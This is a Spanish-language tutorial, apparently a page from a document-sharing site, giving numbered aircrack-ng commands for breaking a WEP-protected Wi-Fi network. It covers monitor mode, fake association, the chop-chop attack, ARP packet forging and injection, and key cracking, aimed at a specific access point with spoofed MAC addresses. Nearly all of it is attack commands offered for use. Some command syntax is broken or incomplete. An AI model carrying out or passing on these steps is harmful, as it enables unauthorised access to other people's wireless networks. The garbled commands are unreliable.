Está en la página 1de 11

1.

- checamos cual es nuestra interfase para poderlo en modo monitor:

airmon-ng

2.- como sabemos ponemos nuestra interface en modo monitor:

airmon-ng start
3.- ahora miramos que AP tenemos.

airodump-ng
4.- Como vemos nos aparecen algunas así que seleccionamos una, en este caso seleccionare
2WIREXXX.

airodump-ng c 6 -w lir -i
5.- Después nos asociamos:

aireplay-ng -1 0 -e 2WIRE -a 00:14:95:CE:2E:11 -h 00:11:22:33:44:55


6.- Ahora procedemos hacer el ataque Chop-Chop:

aireplay-ng -4 -b 00:14:95:CE:2E:11 -h 00:11:22:33:44:55


Le ponemos yes
7.- Usamos tcpdump para poder mirar la ip que nos interesa.

tcpdump -s 0 -n -e -r replay_dec-0920-161359.cap
8.- Creamos una petición de paquete arp usando el archivo .xor:

packetforge-ng -0 -a 00:14:95:ce:2e:11 -h 00:11:22:33:44:55 -k 192.168.1.140 -l 192.168.1.254


-y replay_dec-0920-161359.xor -w ddlr.cap
-l ip origen
-k ip destino

9.- Finalmente enviamos el recien creado paquete de peticion arp:

aireplay-ng -2 -r ddlr.cap

Le damos yes:
y empezara inyectar super rápido, te sorprenderás de la velocidad.

10.- Finalmente sacamos el password:

aircrack-ng lir-01.ivs

También podría gustarte